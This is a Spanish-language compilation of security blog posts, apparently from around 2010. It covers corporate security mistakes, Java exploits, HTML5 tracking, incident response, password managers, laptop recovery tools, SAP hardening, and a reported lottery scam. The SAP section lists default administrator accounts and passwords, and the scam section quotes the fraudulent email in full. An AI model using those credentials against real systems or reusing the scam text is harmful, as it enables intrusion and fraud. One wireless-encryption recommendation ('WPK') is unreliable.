A pesar del gran esfuerzo de los gerentes de TI, muchos incidentes de seguridad son consecuencia de simples errores que se podrían haber prevenido fácilmente. Para que su empresa no se convierta en una estadística, mire esta lista de los principales errores garrafales de seguridad y asegúrese de no cometerlos.

1. Redes inalámbricas sin protección

Las redes inalámbricas representan la vulnerabilidad de seguridad más común en la mayoría de las empresas. Piense en el volumen y la importancia de la información transmitida por redes inalámbricas en apenas un día: transacciones de puntos de venta con tarjetas de crédito, correos electrónicos donde se detalla información interna de la empresa, trabajadores remotos que acceden a la base de datos de la empresa, mensajes instantáneos… y la lista sigue.
El problema de las redes inalámbricas es que no se pueden proteger de manera física. Con el dispositivo adecuado, cualquiera puede sentarse fuera de un edificio de oficinas y detectar el tráfico inalámbrico de bienes valiosos. O puede directamente ingresar y acceder a sus sistemas.

Qué hacer: Por suerte, existe una solución bastante sencilla y eficaz. Aplique mejores protocolos de cifrado en su red inalámbrica o elija un mejor cifrado inalámbrico, como WPK. Para los portales que deban permanecer abiertos, para acceso a VPN remoto, por ejemplo, asegúrese de aplicar una estrategia de autenticación segura.

2. Contraseñas débiles

Lo sabemos: elegir contraseñas seguras es engorroso. Tenemos tantas contraseñas para tantas cosas y recordar una serie complicada de caracteres es difícil. Entonces, muchos tomamos el atajo de usar la misma durante años o elegir una sencilla para poder recordarla.
El problema es que los piratas informáticos lo saben. Las contraseñas débiles son vulnerables a ataques de diccionario, mediante los cuales los piratas crean listas completas de contraseñas posibles y probables y las prueban en portales de entrada a su red. Ese truco de cambiar la ‘e’ por el número ‘3’ para crear una contraseña más complicada también lo conocen. Y figura en sus diccionarios.

Qué hacer: Desarrolle y aplique una política estricta de contraseñas para todos sus usuarios, incluso los ejecutivos importantes a quienes no se debe molestar. Asegúrese de que toda la empresa actualice con frecuencia las contraseñas.

3. Olvidarse de eliminar identidades de antiguos empleados

La vida es así: los conflictos existen y, a veces, hay empleados que abandonan la empresa en malos términos. Si un empleado está lo suficientemente enojado como para realizar una acción malintencionada, podría acceder a datos confidenciales de la empresa mediante sus credenciales, si no fueron eliminadas. Ni siquiera tienen que escabullirse, en esencia, pueden pasar caminando por la puerta principal.

Qué hacer: Trabaje con su departamento de RR.HH. para definir un protocolo estándar de manejo de la salida de empleados y asegúrese de que las identificaciones desactualizadas se eliminen del sistema lo antes posible. Estos protocolos deberían aplicarse ante la salida de todos los empleados, se hayan ido en buenos o malos términos.

4. Uso irresponsable de unidades USB

Las unidades USB son prácticas, baratas, comunes y pequeñas, lo cual puede representar una vulnerabilidad de seguridad de dos formas.
Un empleado podría copiar información confidencial de la empresa en una unidad USB sin cifrar y luego perderla, lo cual dejaría los datos a disposición de quien encuentre el dispositivo. O bien, una persona malintencionada puede cargar un virus en una unidad USB y dejarla en un lugar donde llame la atención para que algún empleado desprevenido la tome y trate de usarla. Al abrir la unidad en una máquina, podría entrar en acción e infectar el aparato o, peor, la red.

Qué hacer: Eduque a sus empleados sobre el riesgo potencial de seguridad de usar unidades USB. Invierta en unidades USB cifradas para los empleados que manejen información confidencial y necesiten dispositivos portátiles.

5. Discos duros de notebooks sin cifrar

Con nuestra fuerza laboral cada vez más remota y móvil, las notebooks son habituales en el lugar de trabajo. La mayoría de los empleados accede a archivos de la empresa y los almacena mediante una conexión VPN, pero los archivos suelen acabar en discos duros de notebooks. Esto representa muchos lugares potenciales con información confidencial desprotegida.
Ocasionalmente, las notebooks se pierden o son robadas. Es una realidad. Un disco duro sin cifrar y los archivos allí almacenados quedan a disposición de cualquiera que use la notebook.

Qué hacer: Desarrolle una política para toda la empresa que regule la seguridad de sus dispositivos portátiles. Una política completa debe incluir protocolos para reportar y realizar seguimiento de las pérdidas y los robos de notebooks.

Fuente: HP Tecnología


Aumentan los ataques que se aprovechan de vulnerabilidades en Java

Aumentan los ataques que se aprovechan de vulnerabilidades en Java: “A pesar de que, al hablar de vulnerabilidades, casi siempre nos referimos a agujeros de seguridad en sistemas operativos y, recientemente, productos de Adobe, Microsoft ha informado del impresionante aumento que han tenido, desde mediados de verano, los ataques que se aprovechan de vulnerabilidades de Java. El número de ataques ha crecido de forma exponencial en los últimos meses, especialmente aquellos que aprovechan tres vulnerabilidades concretas. Estas son:

Todas ellas son vulnerabilidades multiplataforma y están solucionadas pero, a pesar de que Java es un software instalado en una gran cantidad de sistemas, la mayoría de usuarios ignora o hace muy poco caso a las actualizaciones existentes. Tampoco ayuda a solucionar esta situación el hecho de que el propio actualizador de Java, programado por defecto a actualizarse el día 14 de cada mes, algunas veces no reconozca la existencia de actualizaciones. Asimismo, al tratarse de un programa que se ejecuta en segundo plano, mucha gente no es consciente de su existencia, a diferencia de otras aplicaciones como Adobe Reader.

No obstante, a pesar de este alarmante crecimiento, salvo honrosas excepciones, este impresionante aumento en el aprovechamiento de vulnerabilidades de Java ha tenido poca repercusión medíatica y, según comentan desde la propia Microsoft, es posible que a los proveedores de Internet (normalmente los primeros que dan la voz de alarma cuando aparecen nuevas formas de aprovechar vulnerabilidades) les cueste encontrar una solución eficaz a este problema, sobre todo por el impacto en el rendimiento del sistema de detección de intrusos del propio ISP.

Aunque el número de amenazas que se aprovechan de las vulnerabilidades del software de Java aun son pocas en comparación, por ejemplo, de aquellas familias de malware más detectadas por las firmas antivirus, el crecimiento exponencial de las mismas nos alerta de que algo se está cociendo y, desde el laboratorio de ESET en Ontinet.com, recomendamos revisar la versión de nuestro software de Java, bien usando el propio actualizador que incorpora o aplicaciones de terceros como Secunia Software Inspector.

Fuente: Protegerse


La llegada del HTML5: ¿El fin de la privacidad en Internet?

La llegada del HTML5: ¿El fin de la privacidad en Internet?: “

(cc) hernandezeat

Tu ubicación y zona horaria, fotografías y textos compartidos, los comentarios que escribes en blogs y foros, el contenido de tu carrito de compras, tus direcciones de correo electrónico y el historial de las páginas Web que visitas, son algunos de los datos a los que los anunciantes podrán acceder incluso semanas después de que navegues en sitios Web desarrollados en HTML5.

Esa es la advertencia que publicó The New York Times sobre la privacidad en la Red una vez se implemente la nueva versión del lenguaje con el que se construyen las páginas web de la internets.

¿Qué ha desatado la polémica? Un desarrollador de California llamado Samy Kamkar, famoso por haber creado el gusano “Samy Worm” que en 2005 afectó a MySpace, ahora creó una supercookie llamada “Evercookie” que afecta al estándar HTML5, es muy difícil de eliminar y almacena información privada de los usuarios.

La Evercookie es capaz de infiltrarse a través del HTML5 e instalarse hasta en 10 sitios diferentes del computador, donde almacena y luego comparte información. Asegura su creador que fue desarrollada para demostrar lo fácil que les resultaría a las empresas infiltrar y espiar a los usuarios a través del nuevo lenguaje de Internet.

Al respecto, Pam Dixon, la directora ejecutiva del Foro Mundial de Privacidad en California, advirtió:

HTML 5 abre la caja de Pandora del seguimiento en Internet.”

Explican los expertos citados por el diario estadounidese que el HTML5 presenta mayores oportunidades de seguimiento debido a que utiliza un proceso en el que grandes cantidades de datos pueden ser recolectados y almacenados en el disco duro mientras el usuario está en línea. Hakon Wium Lie, director de tecnología de Ópera subraya:

El nuevo lenguaje Web tendrá a su disposición toneladas de datos para seguir a un usuario”

La clave: Precaución

Quiénes nos pasamos la vida navegando en Internet ya estamos acostumbrados a las “cookies” (información que se almacena en nuestro equipo al navegar en Internet), y que en ocasiones nos ahorran el tener que escribir nombre de usuario o contraseñas cada vez que iniciamos una sesión en determinado sitio Web. “Sabemos manejarlas” y estamos al tanto de las recomendaciones de seguridad para borrarlas si accedemos a nuestras cuentas desde equipos extraños.

Allí está la clave: Precaución de parte del usuario. Martín Álvarez, director de la oficina española del W3C, explicó al diario El País de España que el problema con el HTML5, al igual que con versiones previas, no está en errores del código, sino de formación de los usuarios:

Cada vez que se comparten datos personales en la red el navegador pregunta al usuario. Así pasa con cuestiones de posicionamiento o en consultas a la agenda. Cuando un usuario acepta que el navegador tenga acceso siempre a estos datos debe atenerse a las consecuencias”, subraya.

Costo Vs. Beneficio

Aún no se ha estandarizado su uso, pero estamos expectantes ante las posibilidades que nos traerá la quinta versión del lenguaje de marcado de hipertexto. Entre las ventajas más resaltantes de HTML5 destaca la creación de etiquetas mucho más concretas y semánticas, que permitirán reproducir contenido multimedia sin necesidad de descargar un software adicional. Dadas las ventajas que ofrece, el diario estadounidense afirma que los usuarios recibirán al HTML5 con los brazos navegadores abiertos, sin detenerse a pensar en los problemas de privacidad que supone.

Se trata de analizar la relación costo-beneficio según argumentan los expertos en la materia: A medida que avanza la tecnología, los usuarios tendremos que poner en una balanza nuestros deseos de mejorar la velocidad y calidad de acceso a la información, frente a lo que implicaría que estas tecnologías puedan controlar aspectos de nuestra vida privada… Angustiante.

Links:

– El nuevo código de la web plantea dudas de privacidad (ElPais.es)

New Web Code Draws Concern Over Privacy Risks (The New York Times)


Ciclo de gestión de incidentes

Ciclo de gestión de incidentes: “En España todavía las empresas no destinan equipos especiales para la respuesta frente a incidentes y sólo algunas subcontratan este tipo de servicios en los Security Operations Center.

El presente gráfico trata de representar las fases del ciclo de gestión de incidentes y los grupos de atención que deben tratarlo en cada fase. A estas alturas a nadie le sorprenderá ver un ciclo parecido al de Demming (Plan-Do-Check-Act) como eje central de las tareas.

Las distintas fases del ciclo son:

  • Plan: La organización se prepara para defender su infraestructura de TI y los datos mediante la evaluación de sus riesgos y su estado de seguridad. Se trata de entender cuales son las posibles amenazas y si somos o no vulnerables a ellas. El chequeo de vulnerabilidades y los test de intrusión pueden ser actividades de esta fase dado que sirven para evitar la detección ajena del fallo siendo nosotros mismos quienes nos preocupemos por hallar agujeros en nuestra infraestructura. La fase de planificación permite a la organización diseñar una arquitectura de seguridad de la información más robusta frente a los ataques comunes o más triviales. Permite que la Organización no quede al descubierto con los continuos escaneos de vulnerabilidades que se realizan ya a diario a través de Internet buscando potenciales víctimas fáciles.
  • Resistir: Después de haber planeado sus tácticas de defensa y estrategias, e implementar los componentes apropiados de su arquitectura de seguridad, la organización debe resistir los ataques. Esto implica el uso de tecnologías de protección perimetral que hacen de primera barrera y muro de contención frente a ataques ya dirigidos. Los detectores de intrusos y las herramientas más proactivas como los IPS pueden eliminar también mucho ruido de ataques automatizados utilizando herramientas más sofisticadas. Filtrar el tráfico de red no deseado en ambas direcciones entrantes y salientes, las infecciones de malware (en la medida de lo posible), establecer mecanismos de control de acceso a los datos y aplicaciones basadas en métodos de autenticación robustos, etc. Nótese el uso en esta fase del término ‘resistir’, donde ya suponemos que nos toca responder frente a una agresión intencionada.
  • Detectar: Dado que es ingenuo esperar que la organización será capaz de resistir todos los intentos de intrusión, hay que dedicar esfuerzos a detectar los indicios de penetración en nuestros sistemas. Esto implica tener visibilidad y monitorización en todos los niveles de la infraestructura (redes, aplicaciones, datos, etc) y herramientas de detección de intrusos basadas en patrones de uso anómalos mediante la extrusión, la realización de la detección de cambios, la recolección y revisión de los registros, y así sucesivamente. Los datos recogidos en la fase de detección son fundamentales para investigar el alcance de la intrusión de una vez han sido descubierta. Muchas organizaciones no implementan esta fase correctamente y no recogen evidencias digitales que luego les permita emprender acciones legales si la gravedad del asunto lo requiere.
  • Actuar: Una vez que el incidente ha sido detectado, la organización se moviliza para responder a la intrusión. Este proceso generalmente implica entender el alcance del incidente, la situación y su resolución. El análisis de los hechos una vez resuelto el conflicto debe servir para aprender de los errores y debe contribuir a mejorar la fase de planificación inicial de protecciones del nuevo ciclo que comienza.

Lo que es básico e imprescindible es aprender de los errores. Un incidente no queda solucionado cuando acaba el ataque sino cuando se mitiga cualquier remota posibilidad de que los hechos puedan repetirse. El hombre es el único animal que tropieza dos veces en la misma piedra. Sin embargo, una buena gestión del ciclo de vida de un incidente debe evitar precisamente ese segundo tropiezo. La herramienta que Google pone a disposición de los administradores de red mejorará la fase de detección y por tanto, servirá para hacer que se actúe y fortaleza el organismo frente a los ataques ya detectados. No se trata de creer que se está seguro sino de tener constancia y datos que lo objetiven. Mantener a cero el marcador de buenos frente a malos es el objetivo. El único problema es que el partido tiene hora de inicio pero nunca hora de fin. Hay que mantener la tensión siempre… porque los malos no llaman a la puerta y buscarán el mínimo descuido para entrar.Existe una enorme desproporción entre el esfuerzo del defensor y del atacante.

Fuente: Javier Cao Avellaneda


Especial Contraseñas Seguras: Almacena las contraseñas en el navegador

Especial Contraseñas Seguras: Almacena las contraseñas en el navegador: “

Gestiona las contraseñas desde tu navegador favorito

Seguimos con otro artículo de nuestro Especial Contraseñas Seguras. Esta vez vamos a explorar las opciones que tenemos para la aplicación que más solemos usar: el navegador.

En Internet hay un gran número de servicios, y la mayoría necesitan una contraseña para entrar, a espera del desarrollo de otros protocolos como OAuth o Facebook Connect. Por eso, es importante que nuestro navegador gestione bien nuestras contraseñas y las almacene de forma segura. Después del salto tenéis el análisis, empezando por los gestores de contraseñas integrados.

Gestores de contraseñas integrados en el navegador

Los gestores integrados de Firefox, Chrome y Opera

Todos los navegadores tienen un gestor de contraseñas más o menos decente, que almacena automáticamente nuestros datos para entrar en los servicios web. El mejor, sin duda, es el de Opera. Pulsando Ctrl+Enter, rellenará el formulario y directamente entraremos en el servicio en cuestión. Además, podemos establecer una contraseña maestra, y también tenemos la posibilidad de que rellene automáticamente los formularios de registro con nuestros datos. Lo malo es que sólo podemos ver en qué sitios hay contraseña almacenada, y no podemos ver ni el usuario ni la contraseña usadas.

El siguiente gestor es el de Firefox. Al igual que el de Opera, rellena automáticamente los formularios de entrada, y podemos establecer una contraseña maestra. Después podemos ver tanto el usuario como la contraseña de los sitios en los que se ha almacenado. El gestor de Chrome es igual, salvo por el hecho de que no podemos elegir una contraseña maestra.

Los gestores integrados de Safari e Internet Explorer

Safari también gestiona las contraseñas de manera similar a Chrome, pero no nos permite ver las contraseñas almacenadas. Por cierto, este gestor no viene activado por defecto, para hacerlo hay que ir a Preferencias, después Autorrelleno y activarlo desde ahí.

Por último, Internet Explorer. Lo único que hace con sus contraseñas es almacenarlas y luego rellenar formularios, pero no podemos ver nada de lo que está guardado, ni siquiera los sitios con estas contraseñas guardadas.

LastPass

Diálogo de LastPass para almacenar contraseñas

De LastPass hemos hablado en casi todos los artículos de este especial, y es que es un servicio realmente excepcional. Funciona en Firefox, Chrome, Internet Explorer y Safari, y nos permite guardar las contraseñas y sincronizarlas con el servidor online, para luego rellenar los formularios automáticamente. Además, se integra muy bien sin molestar en la navegación.

Podemos clasificar las contraseñas por grupos, y también tenemos opciones para acceder automáticamente sin pulsar ningún botón. Si queremos también podemos meter nuestros datos (nombre, apellidos, correo, dirección, etc) para que rellene él solito los formularios de registro.

Descarga | LastPass

XMarks

Diálogo sincronización Xmarks

XMarks era, en un principio, una extensión para Firefox que sincronizaba los marcadores entre distintas instalaciones. Sin embargo, ha ido mejorando con el tiempo y ahora funciona en Internet Explorer, Firefox, Chrome y Safari, y además de los marcadores también sincroniza nuestras contraseñas.

Una ventaja que le veo a XMarks es que se integra con el gestor interno de cada navegador, sólo sincronizando los datos, para que el navegador se encargue de rellenar los formularios y almacenar las contraseñas. Así resulta muy poco molesto, y pasa inadvertido. Además, XMarks protege nuestras contraseñas con un código PIN para que sólo nosotros podamos acceder a ellas, ya sea desde el navegador o desde la web my.xmarks.com.

Descarga | XMarks

Sincronizar Firefox y las carteras de GNOME y KDE

Firefox con Gnome y KDE

Y por último y antes de acabar con este artículo, un pequeño bonus. Muchos de los usuarios de Linux usamos Firefox como navegador predeterminado, y es una lata que no se integre con los gestores de contraseñas de los entornos GNOME y KDE. Por suerte, existen dos extensiones que cumplen con esta función para ambos escritorios. De esta forma, podremos aprovechar la potencia de los entornos de escritorio, que tienen este tipo de gestores muy bien integrados. Aquí van los enlaces:

Descarga | Integración de Firefox con GNOME-keyring
Descarga | Integración de Firefox con la cartera de KDE

Y hasta aquí esta entrega del Especial Contraseñas Seguras en Genbeta. Espero que os haya sido útil, y dentro de poco tendréis el siguiente artículo, en el que veremos cómo guardar las contraseñas en vuestros móviles.

En Genbeta | Especial Contraseñas Seguras


Protección de Laptops ante robos

Debido a algunas consultas en relación a este tipo de incidentes realicé un pequeño lab asociado a la evaluación de 2 productos opensource referidos a la protección/recupero de laptops:

  1. PreyProject @ www.preyproject.com
  2. The Laptop Lock @ www.thelaptoplock.com

El primero dentro de todo es una solución nueva y el segundo ya tiene un tiempo.

En ambos productos es necesario registrarse, y a través de la instalación de un agente, dar de alta los equipos que quieren monitorearse. En este sentido PreyProject provee muchas más opciones de monitoreo que The Laptop Lock, sin embargo este último provee acciones al denunciar robada la laptop, que el otro producto no provee, por ejemplo, borrar una determinada carpeta, cifrar el contenido de una carpeta, etc.

En los dos productos es necesario denunciar el equipo robado a través de la interfaz web, lo cual dispara las distintas acciones que hayamos configurado en el agente.

A modo de ejemplo les comento algunas acciones:

Preyproject: genera un mensaje en el equipo robado con el texto que nosotros definamos, por ejemplo “Este equipo ha sido extraviado, contáctese con “x””, además se puede disparar una sirena que comienza a reproducirse en el equipo. Una característica importante es que toma una captura de pantalla de la sesión activa, el usuario logueado, los procesos y direccionamiento público y privado. El direccionamiento lo trata de ubicar geográficamente (esto último no está funcionando muy bien). En apple y linux puede cambiar el wallpaper con algún texto que nosotros definamos. Con toda esta información genera un reporte que luego puede ser visualizado vía web, también envía alertas por mail anunciando que el contenido está disponible.
El agente puede configurarse para que trabaje cada “n” cantidad de minutos, en el equipo evaluado no se ha notado caída de performance por el funcionamiento del producto.

Preyproject utiliza unix (cron, bash), sin embargo toda la configuración es a través de un GUI junto con la instalación y desinstalación. Cerrando la sesión activa, e iniciando otra, también ha notificado que el equipo ha sido robado y ha generado un informe con las características antes mencionadas.

Si el usuario logueado posee permisos privilegiados también informa el Default Gateway y la Mac Address.

The Laptop Lock: el producto es mucho más simple que Preyproject, sin embargo provee medidas de protección reactivas que favorecen el resguardo de la información que pudiera contener el equipo robado. Cifrar archivos o carpetas, reproducir un comando, etc son las facilidades que provee este producto, la protección del agente a través de una contraseña es una medida de seguridad que lo diferencia de Preyproject. Los reportes contienen la IP involucrada y un link hacia DNStuff para realizar un WhoIs, etc, pero no tiene el mismo detalle que Preyproject en cuanto a los reportes.

Conclusiones
Los 2 productos son buenos, tienen diferencias que permiten optar por uno u otro según el tipo de tratamiento/protección que queramos implementar. Es importante mencionar que la utilización de estos productos debe estar acompañada de políticas de seguridad asociadas a la gestión de los equipos portables/móviles, dado que un usuario con permisos de administración podría desinstalar el producto. Adicionalmente dado que estos productos requieren de internet para comunicarse con el web service, si no tienen conexión no se podrá relevar ninguna información.

Estos productos no reemplazan una solución de cifrado (si la clasificación de la información lo amerita), sino que son un complemento a estas medidas y podrían facilitar el recupero de los equipos.
Por otro lado, políticas asociadas al uso de la información podrían disminuir la posibilidad de que en los equipos portables se encuentre información de negocio que tuviera algún valor para un posible atacante.

En fin estos productos no son infalibles, pero sin dudas, en conjunto con otros controles podrían ser muy útiles para el recupero de equipos robados.

Fuente: SecureTech


Seguridad en SAP

Seguridad en SAP: “

Recientemente recibimos un curso de Seguridad en SAP durante el que se analizaron los aspectos más importantes en la seguridad de estos entornos y los errores más comunes que pueden encontrarse en una implantación SAP. SAP es un sistema de planificación de recursos empresariales o ERP que permiten, mediante módulos, la integración y control de todas las operaciones relacionadas con la compañía, y como podrán imaginarse una reducción de costes para ésta. Se compone de una serie de módulos que realizan una función en concreto, como la gestión de almacenes (WM), producción (PP-PI), gestión de calidad (QM), gestión de materiales (MM), etc. Cada uno de estos módulos proporcionan al entorno SAP un mayor número de funcionalidades. En esta entrada de Security Art Work se comentarán, de forma resumida, los procesos correctores más comunes en el ámbito de la seguridad dentro de un sistema de estas características.

Los aspectos más habituales de seguridad SAP se centran en la parametrización general del sistema, la configuración de transacciones incompatibles desde el punto de vista operativo en el entorno de los procesos de negocio, la segregación de funciones y la gestión de identificación y autenticación de usuarios. Pero antes de comenzar a tratar cada uno de los puntos expuestos con anterioridad, debemos presentar el concepto de mandante. Un mandante es un subsistema o unidad independiente dentro de un sistema SAP. Las acciones que se realizan dentro de cada mandante reciben el nombre de transacción. Éstas son órdenes que llaman a un programa escrito en ABAP, que a su vez realiza transacciones a través del core de SAP, consultando en la mayoría de los casos la base de datos.

Desde el punto de vista de seguridad, los mandantes deben estar cerrados y no permitir las modificaciones a objetos del repositorio y la parametrización no dependiente del mandante. Para ello hay que restringir las transacciones SE06 y SCC4 indicando que no son modificables, no se debe permitir la comparación de customizing ni admitir cambios no dependientes del mandante, se debe seleccionar el nivel 2 de protección e indicar que el rol del mandante es de tipo productivo. Otras transacciones críticas a tener en cuenta a la hora de restringir su acceso son la SV01 (gestión de usuarios), SN01 (transacciones que se pueden realizar) y SCC5 (borrar el mandante).

Los mandantes por defecto en todo sistema SAP son 000, 001 y 066. Si no existe usuario para estos mandantes se podrá acceder a este mediante el usuario SAP* y la contraseña PASS, de la misma forma que si existen los usuarios por defecto, estos serán SAP* y DDIC, con contraseña 06071992 y 19920706 respectivamente. Otros usuarios por defecto son SAPCPIC y EARLYWATCH (sólo mandante 066), todos ellos con permisos de administración. Por tanto es importante en toda implantación SAP -como en toda implantación a secas- cambiar las contraseñas por defecto de dichos usuarios mediante el report RSUSR003.

En el entorno SAP existen una serie de transacciones que deben ser limitadas, incluso impedir desde cualquier usuario su llamada, debido a los riesgos de seguridad que implican. Principalmente se trata de la SE11, SE16, SE30, SA38, SM30, SE16m y SM49, y debemos prestar especial atención a RSBDCOS0, SM38 (shell de sistema), SM49 (creación de órdenes del sistema) y SM59 (ejecución de órdenes en el sistema). Otro punto de control a tener en cuenta son aquellas transacciones desarrolladas a medida para la empresa por un equipo de desarrollo no perteneciente a SAP y que, por tanto, no han pasado por el equipo técnico de calidad de SAP. Estas transacciones se identifican por la primera letra del nombre de la transacción (letra Z o letra Y) y son las llamadas transacciones Z* o Y*. Deben cumplir con unos requerimientos mínimos de seguridad que limiten su ejecución a los usuarios autorizados para ello; estas restricciones específicas se conocen con el nombre de authority-check y sin ellas cualquier usuario con acceso a la transacción de lanzamiento SE38 o SA38 podría ejecutar dichas transacciones (existe el report RSRSCAN1 que permite comprobar si se están realizando los correspondientes comprobaciones de autorización).

Otro aspecto de seguridad en el ámbito de SAP es el relacionado con la gestión de usuarios; de entrada, no se debe permitir a un usuario saltar a otro mandante distinto al asignado, para lo que aquellos usuarios que se conecten de forma remota (ya sea mediante la interfaz Web o mediante el cliente R/3) deben de estar configurados como usuarios de fondo y NO como diálogo. De la misma forma, es recomendable la aplicación de políticas de seguridad que fuercen al uso de contraseñas seguras, por ejemplo empleando la transacción SM30 → USR40 para especificar, mediante expresiones regulares, qué contraseñas no son válidas y un diccionario de palabras no permitidas. Adicionalmente, mediante el uso del report RSPARAM, se pueden parametrizar aspectos como el número de logins incorrectos, longitud mínima de la contraseña, seguimiento de la inactividad, etc.

Finalmente, pero no por ello menos importante, debemos hablar de una segregación de funciones correcta en SAP, que no permita a un determinado usuario acceso a determinadas combinaciones de transacciones; para ayudar en esta segregación de funciones, SAP dispone del report RSVR008_009_NEW, que permite indicar las combinaciones críticas existentes en el sistema.

Seguiremos añadiendo algún post de este mundo -SAP- que hasta el curso que hemos comentado, desconocía por completo y que, una vez hemos comenzado a entrar en él, se adivina inmenso -y conflictivo- desde el punto de vista de su seguridad.


Loteria de MOBIL OIL Nigeria (otra estafa)

Loteria de MOBIL OIL Nigeria (otra estafa): “Nuevamente recibimos una denuncia de un lector que recibió este mensaje. Tal como hace informamos hace unos días se trata de otra variante de intento de estafa, estilo nigeriana. Este es el mensaje (incluidos errores originales de redacción)

—–Mensaje original—–

De: MOBIL OIL® COMPANY [mailto:info@mobil.com]

Enviado el: sábado, 28 de agosto de 2010 12:12 a.m.

Asunto: SU han ganado en la lotería de petróleo de Nigeria MOBIL

MOBIL OIL® COMPANY,

WEST AFRICA

LAGOS, NIGERIA

informó que su dirección de correo electrónico ha ganado un premio la suma

de $ 535,000.00 USD (quinientos treinta y cinco mil) en los últimos Sorteo

Email Promoción celebrada el 27 de agosto 2010 0f por Mobil Oil Nigeria

Limited. Póngase en contacto con UPS EXPRESS EL CORREO DE LA EMPRESA para

entregar su cheque certificado ganar canjeables Banco a usted, con sus

datos a continuación.

FullName ………………

Número de teléfono ……….

ContactAddress ………..

País ……………….

Ocupación …………….

Sexo …………………..

EDAD …………………..

NOTA

usted no está para pagar los gastos de envío de su cheque cobrable ganar,

sólo está para pagar sólo $ 105 para el mantenimiento de la seguridad tasa

a la empresa de mensajería company.The petrolera Mobil Nigeria habría

pagado por la seguridad de mantenimiento de las tasas

pero no sé cuándo obtendrá incontact con el finde empresa de mensajería no

causar demora.

Sr. Christian Dave

Correo electrónico: ups_delivery-unit@rcweb.net

Tel: +2348162931904

Se observa en el texto que de antemano avisan que para obtener el ‘premio’ se le requiere pagar ‘sólo’ $105, siendo esta la forma en que se materializa la estafa, pues nunca se enviará ningún premio. Este atractivo premio es la pieza de ingeniería social o debilidad humana que explotan desde hace siglos los estafadores con pequeñas variantes.

Además este caso de este correo fraudulento tiene el ingrediente interesante de provenir de una dirección IP que corresponde a una importante universidad pública en Argentina. Probablemente como sucede en estos caso se trate de una máquina zombie en esa red para conseguir emitir el correo de la estafa desde una IP con buena reputación y así eludir filtros anti-spam.

Recuerde: nunca conteste correos de desconocidos, no caiga en al trampa de la promesa de algo muy bueno.

Raúl de la Redacción de Segu.Info